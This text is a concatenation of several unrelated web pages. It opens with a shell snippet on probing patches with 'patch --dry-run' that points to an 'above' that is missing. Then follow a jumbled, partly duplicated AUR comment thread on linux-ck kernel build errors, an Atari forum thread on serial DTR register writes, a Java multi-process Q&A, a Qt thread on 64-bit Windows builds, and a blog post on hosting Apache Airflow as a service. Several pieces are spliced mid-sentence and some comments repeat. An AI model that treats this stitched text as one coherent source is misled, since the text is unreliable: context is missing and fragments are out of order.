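The -R reverse apply above, and "already applied" situations like the one at the top of this thread, can be probed non-destructively with patch's --dry-run mode. A toy example with hypothetical demo files (not the kernel tree):

```shell
# A file and a one-line unified diff for it (demo files only).
printf 'old line\n' > demo.txt
printf -- '--- demo.txt\n+++ demo.txt\n@@ -1 +1 @@\n-old line\n+new line\n' > demo.patch

patch -p0 -s --forward < demo.patch    # first application succeeds

# If the reverse applies cleanly, the patch is already in the file;
# a backwards diff can likewise be applied for real with -R (no --dry-run).
if patch -p0 -R --dry-run -s -f < demo.patch >/dev/null 2>&1; then
    echo "patch already applied"
fi
```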
Hello, with the latest PKGBUILD the order for depmod and "move module tree /lib -> /usr/lib" was exchanged and it gives this error: DEPMOD 3.5.4-1-ck ERROR: could not open directory /home/user/linux-ck/pkg/linux-ck/usr/lib/modules/3.5.4-1-ck: No such file or directory FATAL: could not search modules: No such file or directory Undoing the change, it builds correctly.: linux-ck-headers provides also "linux-headers=${pkgver}", but I think it should not, especially if you have more kernels (I have installed linux and linux-ck) For example, compiling r8168-all. alium commented on 2012-08-28 07:28 linux-ck-headers provides also "linux-headers=${pkgver}", but I think it should not, especially if you have more kernels (I have installed linux and linux-ck) For example, compiling r8168. I decided to give the modprobed_db + localmodcfg a try. I'm using lvm2 with dm-crypt, and run into errors when mkinicpio. dm-snapshot and dm-mirror, which are appearently required, are not found. When I manually load these via modeprobe, they don't appear after I run modprobed_db store. Any one have thoughts on this? My current solution it to also run nconfig and manually enable it. graysky, ok, I will. The developer guy in alsa-devel who made this patch said, that it will be included in upstream. I think it will be included in 3.6. I just found that audio codec is used 100% of time as powertop says and this cannot be fixed without reboot or suspend, but everything was OK for me in 3.4.x. corro commented on 2012-08-23 00:50 I can confirm a noticable improvement in battery life with this patch applied. When measuring power consumption with powertop, it says it's about 2-3 Watts less than before. The latest kernel 3.6-rc3 has the same problem. ValdikSS, you should definitely report this issue. @ValdikSS - I changed my mind about your suggestion and have added it to v3.5.2-3. 
Can I ask that you open a bug report against the linux package in [testing] reporting the known issue and directing them to the patch you referenced? Will upload new PKGBUILD in a few. Bump to v3.5.2-1 Sorry for the double bump, but I wanted to add more verbosity to the original announcement from 16 Aug 2012 21:18:39 Enjoy! I agree with you because the stability of this patch is really bad. But the stability of the patch for 3.4.6+(enable CONFIG_NO_HZ) is great. I am using it for several days and everything works great. "{_basekernel}.6+-ck${_ckpatchversion}" If you do not enable CONFIG_NO_HZ, there will not be any changes. I am using the kernel which has been modified by me now. Although it can be run, it seems to be unstable. At first, 12:07 I am using the kernel which has been modified by me now. Although it can be run, it seems to be unstable. 10:57 Well, after simply commenting the call of calc_load_enter_idle() and calc_load_exit_idle(), compilation has been completed with no errors. I do not know whether there will be bugs or not after doing so. I guess that these two function is used for matching with the new core.c, but bfs.c does not have any changes. So, tick-sched.c need not be changed. Deleting the call of the functions MAY not cause problems. I am afraid of trying it... - Dunno, still waiting for CK to fix this. @all - here is a prerelease of 3.5-1 which does NOT contain a ck1 patchset nor does it contain a BFS. This is an incomplete package but if some of you want to use v3.5 under the linux-ck name, go for it. Note that you need to enable [testing]. On my test system, the USB mouse didn't work without doing so. 
qpalz commented on 2012-08-06 04:42 For In the ck patch, there are the following changes: --- linux-3.4-ck3.orig/kernel/sched/Makefile 2012-03-20 17:39:43.000000000 +1100 +++ linux-3.4-ck3/kernel/sched/Makefile 2012-07-03 14:00:08.131680971 +1000 @@ -11,10 +11,14 @@ ifneq ($(CONFIG_SCHED_OMIT_FRAME_POINTER CFLAGS_core.o := $(PROFILING) -fno-omit-frame-pointer endif +ifdef CONFIG_SCHED_BFS +obj-y += bfs.o clock.o +else obj-y += core.o clock.o idle_task.o fair.o rt.o stop_task.o -obj-$(CONFIG_SMP) += cpupri.o obj-$(CONFIG_SCHED_AUTOGROUP) += auto_group.o -obj-$(CONFIG_SCHEDSTATS) += stats.o obj-$(CONFIG_SCHED_DEBUG) += debug.o +endif +obj-$(CONFIG_SMP) += cpupri.o +obj-$(CONFIG_SCHEDSTATS) += stats.o Index: linux-3.4-ck3/mm/vmscan.c core.o will not be compiled when BFS is used, but calc_load_enter_idle is implemented in core.c. bfs.c does not contain calc_load_enter_idle. This may be the problem. Is there any ideas to solve this problem? @Eithrial This has already been covered. Disable dynamic ticks, aka: # CONFIG_NO_HZ. See comments from 22 Jul. @Graysky Well I'm busy this week, but my plan was to try again later in the week, double and triple check through and try 3.5 again, failing that I was going to pull arch 3.5 from git, have a look through and build it. I have a feeling because I also used localmodconf I may have missed something. Also, using systemd 186-2 had no booting issues for me. graysky commented on 2012-07-25 11:24 @eithrial - Comment by: graysky on Sun, 22 Jul 2012 12:22:02 +0000: Anonymous comment on 2012-07-25 11:02 I can't compile 3.4.6-1. I got [1m[31m==> ERROR:(B[m[1m A failure occurred in build().(B[m [1m Aborting...(B[m felixonmars commented on 2012-07-25 06:42 I'm using systemd 187-2 and have no trouble at all on 3.5.0-0. SirWuffleton commented on 2012-07-25 06:19 @graysky: Just enabled [testing] and -Syyu'd. After a reboot, both linux 3.5-1 and systemd 187-2 worked fine with no issues whatsoever. 
A full build of linux-ck 3.5-0 without localmodconfig is also working fine on my setup now that I've removed the btrfs_advanced hook.: Yikes, thanks for that information. I definitely won't be looking forward to that moving into core if those issues aren't resolved by then. It looks like the nonfunctional usb keyboard was due to a missing module (I used localmodconfig on my first build of it), and the early-userspace error was somehow the fault of btrfs_advanced, since specifying my root partition on the kernel's command line and disabling that hook resolved that problem. For now, systemd 186 seems to be working fine, seeing as I was able to successfully boot after the init issue was taken care of. misc commented on 2012-07-24 19:30 Haven't been able to boot with systemd since 187 regardless of the used kernel. It will just stop to boot after apparently mounting my partitions once more (it repeats the same massage mentioning my HDD as often as there are Linux-relevant partitions — all ext4 — on it), without any further explanation. All that's possible then is to try to reboot, upon which readahead will complain about a read-only partition and some fsck are run, then it halts again. IOW, right now I'm back to classic initscripts. SirWuffleton commented on 2012-07-24 18:53 I was unable to boot 3.5.0-0, it claimed that /sbin/init did not exist, and kicked me to a recovery shell, and my USB keyboard did not work (but my laptop's built one did). Not sure if it could contribute to this, but I'm using systemd and have a btrfs root (via the btrfs_advanced hook). misc commented on 2012-07-24 13:48 My USB mouse works, but now I have to enable a "Generic HID driver" in addition to the "Special HID" Logitech one. It's a laptop, so no idea how that affects USB keyboards. BTW I couldn't successfully boot at the first time, now it's ok again. Anonymous comment on 2012-07-23 23:40 Hi Graysky, I gave it a test myself - Does my USB mouse work? 
No idea because I couldn't get in to X because my USB keyboard didn't function at all, lol. Do you have USB keyboard? I'm sure I didn't overlook anything when configuring, never experienced this before. Back to 3.4.5 and another fresh config and all is well. graysky commented on 2012-07-23 21:59 @misc - Works fine on my machine expect that my usb mouse does not work. If you build, please report back. Does your usb mouse work? Remember that this -0 release has no BFS nor does it have a BFQ patchset. It is just the 3.5 kernel in the linux-ck formatted PKGBUILD. graysky, do you provide preliminary 3.5-0 build scripts? Because I'd very much prefer to run a "ck-less" 3.5 linux-ck for a few days which still was nonetheless compiled by myself (esp. with makenconfig & localmodcfg) than the default Arch kernel or 3.4.6-ck, and such -0 should only differ by a few lines from -1 anyway. hermes14 commented on 2012-07-23 06:16 Ok, I'm going to disable dynamic ticks for now, and wait for 3.5-ck to be released. Thanks graysky commented on 2012-07-22 20:12 @hermes14- you cannot enable dynamic ticks with 3.4.6 due to an incompatibility in bfs v0.424 and linux v3.4.6. CK will very likely have this fixed in the bfs version that will patch against 3.5 which is just been mainlined today. Did you modify this option in your nconfig? Test by: $ grep src/linux-3.4/.config # CONFIG_NO_HZ is not set hermes14 commented on 2012-07-22 19:04 I get this error: LD vmlinux.o MODPOST vmlinux.o GEN .version CHK include/generated/compile.h UPD include/generated/compile.h CC init/version.o LD init/built-in.o LD .tmp_vmlinux1 kernel/built-in.o: In function `tick_nohz_stop_sched_tick.isra.9': tick-sched.c:(.text+0x49c49): undefined reference to `calc_load_enter_idle' kernel/built-in.o: In function `tick_nohz_idle_exit': (.text+0x49fc7): undefined reference to `calc_load_exit_idle' make: *** [.tmp_vmlinux1] Errore 1 Any idea? How about adding [[ -e ...dvb/stuff ]] && cp .. to the DVB header section? 
I don't use DVB, so disable all of it in the config. I have to edit the PKGBUILD to skip the copy of these otherwise the build will fail, because the files are not to be found. Keep up the good work!? EDIT: I cannot build the ARCH package via ABS (from [testing]) either; ir errors out in the same exact spot INSTALL /scratch/linux/pkg/linux/lib/firmware/yamaha/ds1e_ctrl.fw DEPMOD 3.4.4-3-ARCH ERROR: could not open directory /scratch/linux/pkg/linux/lib/modules/3.4.4-3-ARCH: No such file or directory FATAL: could not search modules: No such file or directory ==> ERROR: A failure occurred in package_linux(). ... Is this because I am NOT using [testing]? graysky commented on 2012-07-04 09:10? Is this because I am NOT using [testing]? failed to build on my laptop (for months it was working fine except today) errors are: arch/x86/include/generated/asm/syscalls_32.h:327:1: error: expected ‘]’ before ‘:’ token make[1]: *** [arch/x86/kernel/asm-offsets.s] Error 1 make: *** [prepare0] Error 2 ==> ERROR: A failure occurred in build(). Aborting... look like there is a typo in the header file. Any idea? It looks like you ran into similar issues about two years ago! I'm not sure if the script has changed at all, but it looks like it's behaving as intended for the most part. The logic could be improved, but not without breaking some user's configs. I don't think it says it's supposed to mark all current modules to be compiled in, so that would still have to be done manually., I'm a little confused by some of the options in the PKGBUILD. If I use _localmodcfg="y" , it loads all of the modules I'd ever need from modprobed_db (love that tool, by the way. Thanks for writing it!) But when combined with _makenconfig="y", I notice that things that ought to be compiled in are marked as modules, and certain areas that wouldn't need anything enabled (modprobed_db has figured out all of the sound modules I need-- no need for any others) still have everything enabled. 
Are these options incompatible, or am I just misunderstanding the point of localmodcfg? Does it just make sure to mark all of the modules I need, and nothing else? Until the proper update and for those interested, here's the diff from the current tarball to build "3.4.3-0", incorporating the only change from testing's linux: Just "patch -i [what you saved it as]" in the folder of the extracted tarball. patch might give a harmless warning since pastebin ate the trailing empty line. misc commented on 2012-06-18 19:45 Until the proper update and for those interested, here's the diff from the current tarball to build "3.4.3-0", incorporating the only read change from testing's linux: Just "patch -i [what you saved it as]" in the folder of the extracted tarball. patch might give a harmless warning since pastebin ate the trailing empty line. alucryd commented on 2012-06-18 16:21 @graysky: It seems inverting the two names will also invert the order in which the package functions are processed. However, the headers function depends on variables created in the linux-ck function, so for this to work, you need to copy the few lines that define those variables from header to linux-ck functions, this is the modified PKGBUILD I used:. It should be possible to remove the lines from the linux-ck function rather than having them in both, but I haven't tested.: Since I'm installing the official kernel from the repo (just to have a functional kernel in case I screw up), I'm not having this problem, linux-headers is in my SyncFirst array and will install before linux, allowing the hooks to build their modules properly. I did some tests today, switching the two package functions will not have the desired effect. BUT turns out changing "true && pkgname=(linux-ck linux-ck-headers)" to "true && pkgname=(linux-ck-headers linux-ck)" will, plus it doesn't involve modifying the order the packages are built. 
Could you make this small change?:36 21:29 Bump to v3.2.4 Your package linux-ck has been flagged out of date by Guardiano [1]. Guys, please post some text indicating to me why this is out of date? 1) 3.4.2 is current per lkml 2) I see no modifications from the Arch debs beyond what is already in 3.4.2-1 some options seem to be missing in .config when using localmodcfg ==> If you have modprobe_db installed, running it in recall mode now Attempting to modprobe entire database... Done! ==> Running Steven Rostedt's make localmodconfig now using config: '.config' [...] Yama support (SECURITY_YAMA) [N/y/?] n Integrity Measurement Architecture(IMA) (IMA) [N/y/?] n EVM support (EVM) [N/y/?] (NEW) aborted! Console input/output is redirected. Run 'make oldconfig' to update configuration. ==> Running make bzImage and modules scripts/kconfig/conf --silentoldconfig Kconfig [...] Yama support (SECURITY_YAMA) [N/y/?] n Integrity Measurement Architecture(IMA) (IMA) [N/y/?] n EVM support (EVM) [N/y/?] (NEW) aborted! Console input/output is redirected. Run 'make oldconfig' to update configuration. make[2]: *** [silentoldconfig] Error 1 make[1]: *** [silentoldconfig] Error 2 make: *** No rule to make target `include/config/auto.conf', needed by `include/config/kernel.release'. Stop. make: *** Waiting for unfinished jobs.... make[1]: Nothing to be done for `all'. make[1]: Nothing to be done for `relocs'. ==> ERROR: A failure occurred in build(). Aborting... which processor family should i chose for apollo lake (goldmont) processor Celeron N3450?
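A number of the checks in this thread come down to grepping the build tree's .config: the truncated `grep src/linux-3.4/.config` earlier was meant to test whether CONFIG_NO_HZ is set, and the processor-family question is answered by the CONFIG_M* symbols in the same file. Sketched against a stand-in config file (contents illustrative):

```shell
# Stand-in for src/linux-3.4/.config (illustrative content only).
printf '# CONFIG_NO_HZ is not set\nCONFIG_MCORE2=y\n' > config.demo

# Dynamic ticks must stay off for bfs v0.424 on linux 3.4.6:
grep NO_HZ config.demo          # "# CONFIG_NO_HZ is not set"

# Which processor family the config was built for:
grep '^CONFIG_M' config.demo    # CONFIG_MCORE2=y
```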
https://aur.archlinux.org/pkgbase/linux-ck/?comments=all
A forum about Atari 16/32 computers and their clones. This forum is in no way affiliated with Atari Interactive. Moderators: Mug UK, Zorro 2, Moderator Team

tschak909 wrote: with the DTR hang-up I was trying to implement a simple sleep, but there isn't an equivalent call in plain TOS.

Code: Select all
#include <unistd.h>
usleep(100000); /* in microsecs */

I'll need to understand how to do it for the other interface devices.

Code: Select all
*((volatile unsigned char *)0xffff8c85) = 5;    /* select register 5 */
*((volatile unsigned char *)0xffff8c85) = 0xea; /* enable DTR */

Code: Select all
*((volatile unsigned char *)0xffff8c85) = 5;    /* select register 5 */
*((volatile unsigned char *)0xffff8c85) = 0x6a; /* drop DTR */

but it doesn't seem to make a dent in Aranym

tschak909 wrote: It's hanging because RTS/CTS is enabled, and it's waiting for CTS to be ready to send the echo packet.

tschak909 wrote: According to:

Code: Select all
flags &= ~(TF_STOPBITS|TF_CHARBITS|T_EVENP|T_ODDP|TANDEM|RTSCTS);
flags |= TF_8BIT | TF_1STOP | RTSCTS;

it works everywhere except Falcon. changing the serial port doesn't seem to make a dent. no serial I/O...wtf?
http://www.atari-forum.com/viewtopic.php?p=377131
jGuru Forums

Posted By: Motor_Qian Posted On: Monday, April 9, 2001 12:12 AM
I've been wondering for a while, for I've never seen anything about Java multi-process. Is there some way to implement Java multi-process like "fork()" on UNIX? Because the JVM is a platform-independent machine, we cannot control processes; those are operating-system features. I need process control over the JVM. Thank you very much.

Re: Is there some way to implement multi-tasking in Java (like "fork()" on UNIX)?
Posted By: Finlay_McWalter Posted On: Tuesday, June 12, 2001 03:57 PM
If you can possibly help it, try to avoid the need for this functionality in the first place, by using a Java application framework like JES (Java Embedded Server). This limits a few of the things you might like to do (mostly security and classloader stuff) but allows multiple programs to coexist in the same JVM. This has the additional benefit that it's much more efficient than a true fork - you still have only one JVM instance and only one OS process, which is much lighter weight than creating multiple processes each running a JVM.

Posted By: Luigi_Viggiano Posted On: Sunday, May 6, 2001 05:30 PM

public class SimpleThread extends Thread {
    int number;

    public void run() {
        for (int i = 1; i < 5; i++) {
            System.out.println("Hello from thread number " + number);
            try {
                sleep(number * 500);
            } catch (InterruptedException ie) {}
        }
    }

    public SimpleThread(int threadNumber) {
        number = threadNumber;
        start();
    }

    public static void main(String[] args) throws Exception {
        new SimpleThread(1);
        new SimpleThread(2);
        new SimpleThread(3);
    }
}
http://www.jguru.com/forums/view.jsp?EID=398528
QT 64 bit on Windows env? mingw 64bit support? bad_alloc on 32 bit...

Hi, I'm having an issue with heap allocation under the Windows 32-bit architecture. I'm parsing a "big" XML file (90 MB) with QDomDocument::setContent(QIODevice *dev, bool namespaceProcessing, QString *errorMsg = Q_NULLPTR, int *errorLine = Q_NULLPTR, int *errorColumn = Q_NULLPTR) and it seems to need around 2GB of memory, which is refused by 32-bit Windows and breaks with a bad_alloc error message. On my 64-bit Linux, I'm reaching 1890920 KB just for the load of the XML and 3050420 KB once my objects are loaded. So from what I read there is no way to cope with such an amount of memory for a process under 32-bit Windows. I'm running Qt 5.5.1 because I'm using webkit, which is removed in 5.6. I've seen on the archive page this version: qt-opensource-windows-x86-msvc2013_64-5.5.1.exe What is it exactly? x86 but with the MS compiler on 64-bit? I'm confused... is that a full 64-bit release, or are the Qt dlls still 32-bit? If I understood correctly, mingw also has 64-bit support. Is there a way to compile with it in 64-bit? Thanks in advance for your answers :)

@mbruel Maybe you should not use QDomDocument, the documentation says: Note: The DOM tree might end up reserving a lot of memory if the XML document is big. For such documents, the QXmlStreamReader or the QXmlQuery classes might be better solutions. An application consuming 2GB of RAM to parse an XML file is not really what I as a user would expect.

@jsulm well yeah, I know that it was not the best idea to use DOM, but the project was started like this 5 years ago and they didn't imagine arriving at such big inputs. There was a "reason" to use DOM: it makes the process of translating the XML into the complex data structure much easier. I'm just getting the project to finish it, and rewriting all the parsing would take quite some time and thus some money for the client, which I don't think is a priority.
We just load the DOM and destroy it once the internal structure is loaded, so it is not a major issue to have to use 2GB and then release them (it seems that maybe not everything ends up released, but that's another issue...). I have no problem running it under a 64-bit Linux environment with 8GB of RAM. The client is using 64-bit Windows with 8 to 16GB of RAM. I'm pretty convinced that if I could deliver them a 64-bit version, they wouldn't have this allocation issue.

@mbruel qt-opensource-windows-x86-msvc2013_64-5.5.1.exe should be the x64 version. I usually use the online installer - there you can select whatever you need.

@jsulm ok thanks, I'm going to try to install it and see... I'm just confused by the naming of the exe... And I would prefer to stick with mingw_64, but it doesn't look like we have this option... I'm using the offline installer because I'm behind a proxy, but I'm having issues as I can't connect to the Qt account... hum. I'll check compiling from the sources...

I've just installed qt-opensource-windows-x86-msvc2013_64-5.5.1.exe and it seems the Qt dlls are in 32 bits, not 64... qmake adds by default the option: -spec win32-msvc2013 I don't really understand the purpose of this release if the dlls are in 32 bits...

@jsulm well I don't know much about Windows, but if I open QT5CORE.DLL with Dependency Walker, I see that it uses c:\windows\system32\Kernel32.dll, user32.dll, shell32.dll ... The dlls in c:\windows\system32 are not 32-bit? Because there is another folder, c:\windows\SysWow64\, where I can find those dlls... How can I know if a dll or an exe is compiled in 32 bits or in 64 bits (like the file command would tell me on Linux)? Let me know if I'm wrong, but a program compiled in 64 bits can't load a 32-bit dll, right?

@mbruel Something that hasn't been mentioned: 32-bit Windows has a stone ceiling of 3GB. Now subtract out 1/4 to 1/2 GB for Windows and however large your app is. This is a huge problem in CAD applications and point cloud applications as well.
I have seen posts about building Qt as 64-bit. You can install Qt (currently 5.6.x) and QtCreator (currently 4.0.3) from MSYS2 at sourceforge. This will give you both the 32-bit and 64-bit kits for static and dynamic builds. The current GNU toolchain is 6.1.0, so you will default to C++14 as a compiler. So, get as modern as you'd like! I have posted instructions (as close as I could remember) in other posts about MinGW32 builds wanting to go 64-bit. You can find the MSYS2 project on sourceforge. It is also mentioned in the 64-bit WIKI on qt.io. I chose this route because I want to focus on the development and not on building Qt.

@mbruel This link is described as "Qt 5.7.0 for Windows 64-bit (VS 2013, 904 MB)" (see). So, qt-opensource-windows-x86-msvc2013_64-5.5.1.exe should be 64-bit. Again, the 32 in system32.dll does not mean it is 32 bits; it comes from the Win32 API name.

@jsulm well I'm confused about how Windows deals with its 64-bit and 32-bit dlls...

$ file /cygdrive/c/Qt/Qt5.5.1_64msvc/5.5/msvc2013_64/bin/Qt5Core.dll
/cygdrive/c/Qt/Qt5.5.1_64msvc/5.5/msvc2013_64/bin/Qt5Core.dll: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
$ file /cygdrive/c/windows/system32/KERNEL32.DLL
/cygdrive/c/windows/system32/KERNEL32.DLL: PE32+ executable (DLL) (console) x86-64, for MS Windows
$ file /cygdrive/c/windows/sysWoW64/kernel32.dll
/cygdrive/c/windows/sysWoW64/kernel32.dll: PE32 executable (DLL) (console) Intel 80386, for MS Windows

So the 64-bit versions are in system32 and the 32-bit ones in SysWow64? Strange naming...

I've installed qt-opensource-windows-x86-msvc2013_64-5.5.1.exe and wanted to compile my project to give it a go, but it seems that msvc2013_64 doesn't come with it and I'm kind of struggling to find it... It seems there was no 64-bit version of msvc2013...

@Buckwheat Same here, I'd prefer to focus on code, but I'm having this 32-bit Windows limitation on heap/stack size... I don't see on MSYS2 how to get Qt directly...
I need a specific version of Qt (5.5.1) for compatibility reasons... I think I'll just try to compile it from source if I don't manage to make the msvc build run in 64 bits...

I believe the best solution is to fix the source of the problem. You should consider re-writing the XML parser. Qt has options to deal with this.

"We just load the DOM and destruct it once the internal structure is loaded so it is not a major issue to have to use 2GB and then release them (It seems that maybe not everything ends up released but that's another issue...)."

Based on this comment, you are only using it to read or write the XML data. I know that QDomDocument is convenient, but since it has a narrow purpose it can be re-written without huge changes to the overall program. Switching to a 64-bit version won't reduce the memory footprint of the application. If anything it will use more than the 32-bit version (the plus is that you have more available). This is not really a good solution to this problem.

@mbruel Look for my other posts on MSYS2. I go through a complete (well, mostly) walkthrough using pacman (the MSYS2 package manager) to download. The nice thing is that you do not have to worry about the /cygdrive/... stuff that is not portable. You also get the GDB debugger and do not have to go through the trouble of downloading and installing CDB for Windows. I admit, the naming conventions on Windows do not make sense. There is a lot of legacy and, as stated, the name just means "not Windows 3.x", which was 16-bit. As a quickie:
pacman -Ss qt shows all the Qt libraries
pacman -Ss toolchain shows the compiler toolchains
to install, pacman -Su ...
pacman works similar to YUM and DNF. This is explained better in my other posts about MinGW.

Chris Kawa (Moderator) replied to:

"well I'm confused about how Windows deals with its 64bits and 32bits dlls..."

Just to clear up some naming confusion: x86 doesn't really mean 32-bit.
There are various flavors of x86 architecture, including x86_64, which is the 64-bit architecture. Unfortunately, although not technically correct, it has become common to call 32-bit builds x86 and 64-bit builds x86_64 or amd64.

qt-opensource-windows-x86-msvc2013_64-5.5.1.exe means a 64-bit Qt build for Visual Studio 2013.
qt-opensource-windows-x86-msvc2013-5.5.1.exe means a 32-bit Qt build for Visual Studio 2013.

Learning the lessons of switching from 16-bit to 32-bit, Microsoft decided not to change library names when switching to 64-bit, to allow easier porting of applications (you don't have to link to libs named differently for 32- and 64-bit). That made a mess on its own, to which another pile of confusion is added by the 32-bit emulation layer in 64-bit Windows called WOW64 (which stands for "Windows On Windows 64-bit"). Combining these two facts you have:

On 32-bit Windows:
C:/Windows/System32/kernel32.dll - this is a 32-bit dll

On 64-bit Windows:
C:/Windows/System32/kernel32.dll - this is a 64-bit dll (yes, exactly the same path as above)
C:/Windows/SysWOW64/kernel32.dll - this is a 32-bit dll

and no, there is no kernel64.dll anywhere.

As for VS2013 64-bit, there is no such thing. The IDE itself is 32-bit, but it comes with a compiler for both 32- and 64-bit. When you install VS, Qt Creator automatically picks up both versions (and some others, like ARM). When you compile Qt from the command line you can select the 32- or 64-bit toolchain by running the vcvarsall.bat batch file from the VS directory with the parameter x86 for 32-bit or amd64 for 64-bit.

@Rondog Well, it would take a few days of work to change the parsing of the xml to use SAX instead of DOM. I agree it would be a good thing to do, but it is not a priority for my client. Nowadays most laptops or computers have a minimum of 8GB of RAM, so using 3GB at launch shouldn't be a problem. Anyway, even without the parsing I could end up needing more than 2GB of RAM, so the move to a 64-bit version is definitely needed.
@Buckwheat I may give it a try, but I've installed on my VM Qt 64-bit for msvc2013 and Visual Studio Community 2013, and I've managed to compile my app in 64-bit. I don't have the bad allocation error anymore and I'm able to use more than 3GB of RAM :) That's good enough for me. Plus, in fact, I guess that using the msvc compiler instead of mingw could just be better for a Windows target (like my client's), as the system calls will be more direct (no need to include mingwm10.dll, libstdc++-6.dll, libgcc_s_dw-1.dll, libwinpthread-1.dll).

@Chris-Kawa Yes, now it is clearer in my mind... I found the naming really confusing when you don't know the Windows environment... this System32 being 64-bit and WOW64 being the 32-bit adaptation... On 64-bit Linux, the 64-bit libs are in /usr/lib and the 32-bit adaptation layer in /usr/lib32... That makes more sense! Concerning Visual Studio 2013, I've found this article on Stack Overflow that explains well the difference between the x86_64 and amd64 compilers. Visual Studio 2013 may be a 32-bit application, but it has a 64-bit compiler and a 32-bit one that can also generate 64-bit output.
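Closing the loop on the earlier question of how to tell a 32-bit DLL/EXE from a 64-bit one without cygwin's file: the answer is in the PE header itself. The two-byte Machine field right after the "PE\0\0" signature encodes the target architecture, which is exactly what file reports as "Intel 80386" vs "x86-64". A minimal sketch in Python (the helper name is my own, not an existing tool):

```python
import struct

# Common PE "Machine" values, per the PE/COFF specification.
MACHINE_TYPES = {
    0x014C: "x86 (32-bit)",
    0x8664: "x86-64 (64-bit)",
    0x01C4: "ARM Thumb-2",
    0xAA64: "ARM64",
}

def pe_architecture(data: bytes) -> str:
    """Return the architecture of a PE image (EXE/DLL) given its raw bytes."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file (missing MZ header)")
    # Offset 0x3C of the DOS header holds the file offset of the PE signature.
    (pe_offset,) = struct.unpack_from("<I", data, 0x3C)
    if data[pe_offset:pe_offset + 4] != b"PE\x00\x00":
        raise ValueError("PE signature not found")
    # The 2-byte little-endian Machine field follows the 4-byte signature.
    (machine,) = struct.unpack_from("<H", data, pe_offset + 4)
    return MACHINE_TYPES.get(machine, hex(machine))
```

On a 64-bit Windows install, pe_architecture(open(r'C:\Windows\System32\kernel32.dll', 'rb').read()) should report the 64-bit machine type, matching the file output quoted in the thread.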
https://forum.qt.io/topic/69667/qt-64-bit-on-windows-env-mingw-64bit-support-bad_alloc-on-32-bit
The Fun of Creating Apache Airflow as a Service

Learn how to make Airflow an as-a-service tool to easily eliminate top enterprise pain points. We faced challenges building this system, but this post is about the fun.

A while back, we shared a post about Qubole choosing Airflow as its workflow manager. Then, last year, there was a post about GAing Airflow as a service. In this post, I'll talk about the challenges - or, rather, the fun we had! - creating Airflow as a service in Qubole. After creating QuboleOperator, which connects Airflow and Qubole, we felt that customers (especially enterprise customers) would want much more. Some of the common pain points for these enterprise customers were:

- Figuring out Airflow's configuration
- Setting up required services like Celery, Rabbitmq, and Flower
- Ensuring the installation is secure and accessible to its users
- Devising a way to authenticate and authorize users
- Setting up monitoring and alerting
- Setting up crons to back up service logs to S3
- Auto-syncing dags from S3 or GitHub
- Setting up AWS keys in Airflow so it can upload task logs to S3

We anticipated those pain points and came up with the solution of bundling tools and features in such a way that the intricacies of Airflow are hidden. This bundling makes Airflow a truly as-a-service tool, eliminating the top enterprise pain points with the click of a button. While we did face challenges while building this system, this post is about the fun.

1. Hosting Airflow Behind an NGINX Proxy

This is the first step any enterprise user would want to do. The typical user wants a simple URL that can be bookmarked and will remain the same even if the machine gets rebooted. In cloud environments, this link would later lead to a new IP address unless you are using Elastic IPs.
In Qubole the URL would be something like this (where 19289 is the ID of the cluster): To have all pages accessible via a common prefix, we've made changes in the code itself. Unlike with Celery Flower, there was no option to specify a prefix URL. There were two types of URLs being used in the Airflow codebase:

- Flask's url_for method
- Hardcoded and relative URLs

We found a nice way to add a prefix to each URL by overriding the url_for method. It saved us a lot of time and kept the code clean. For the hardcoded and relative URLs, we had to go through each page and convert them to the url_for method.

@app.context_processor
def override_url_for():
    return dict(url_for=proxified_url_for)

def proxified_url_for(endpoint, **values):
    return "/{0}{1}".format(airflow_webserver_proxy_uri, url_for(endpoint, **values))

Here, airflow_webserver_proxy_uri would be something like this:

We also made a couple of changes to the way the Flask Admin app gets configured and how views get added to it. However, there remained a single link that could not be fixed, and that was the main "DAGs" link. So we did a hack and added the following Javascript code to the master.html file.

// hacky way of replacing broken link with correct link
dag_link = $("ul.navbar-nav:first > li:first a")[0];
dag_link.href = "{{ url_for('admin.index') }}";

The end result was beautiful. We have no broken pages, and the Airflow UI can be accessed via the NGINX proxy only after a successful authentication and authorization via the Qubole tier.

2. Moving Assets to CDN

Soon after we GAed Airflow as a service, we got feedback about the Airflow UI becoming slow in an unusable way. The cause was clear: Airflow's index page does roughly 20-22 calls to fetch HTML, JS, CSS, and images.
All these calls go through the following stack if the cluster is in a VPC:

Browser > Qubole web node > Tunnel > Bastion Node > Airflow cluster

As you can see, each call has to go through three extra hops, so the index page - which loads in roughly ten seconds on my local laptop - was taking anywhere between 30-60 seconds to load for users. I tried to do HTTP caching on static assets but couldn't figure out a way to do that in Flask. Then we chose a better way: putting assets onto a CDN. Once again, the override_url_for method came to our rescue. We filtered out and redirected asset calls to the CDN. This small enhancement cut down the total page load time to only three to four seconds; much faster than running Airflow on my MacBook. Awesome!

def proxified_url_for(endpoint, **values):
    if 'filename' in values:
        return "{0}{1}".format(cdn_url, url_for(endpoint, **values))
    return "/{0}{1}".format(airflow_webserver_proxy_uri, url_for(endpoint, **values))

3. Adding the Goto QDS Button

Most customers found this feature super helpful, as it saves them a lot of time. To make this work, we had to make some changes to Airflow's UI code base to pass on the task's operator class. We also added a new route in the Flask app to support these calls. This makes use of Airflow's XCom feature to fetch Qubole command IDs and redirect them to the actual command running on the Qubole platform. As it is a Qubole-only feature, it has not been merged into open source. Also, this feature's associated button becomes visible only for QuboleOperator type tasks.

4. Authentication and Authorization Through Qubole

All authentication and authorization on Airflow now happen via the Qubole control panel. As of now, there are only two types of authorization that happen after successful authentication.

Cluster admin > The person who has update access on the cluster and can access all pages.
Cluster user > The admin panel gets hidden and will not be accessible to users who do not have update access on the cluster.

5.
Interoperability Between Airflow and Qubole

Thanks to Airflow's on_failure and on_retry hooks, we were able to make sure that if an Airflow worker reports a failure, we hit the Qubole command API and verify its status. If the command status is successful, then we mark that task instance as a success, and as failed if it failed. If the command is still running, we kill the command in Qubole and mark the TI as failed.

The above feature could be useful in the event a worker dies (although that hasn't happened yet) or a whole node goes down. In such cases, Airflow's scheduler will assume these tasks to be zombies and try to mark them as failed. Using the above callbacks, we were able to keep a constant sync between Qubole and Airflow. The scheduler's zombie detection, the callback hooks, and the four lines of code below make this sync happen.

if cmd.status == 'done':
    logger.info('Command ID: %s has been succeeded, hence marking this TI as Success.', cmd_id)
    ti.state = State.SUCCESS
elif cmd.status == 'running':
    logger.info('Cancelling the Qubole Command Id: %s ', cmd_id)
    cmd.cancel()

6. Auto-Uploading Task and Service Logs to S3

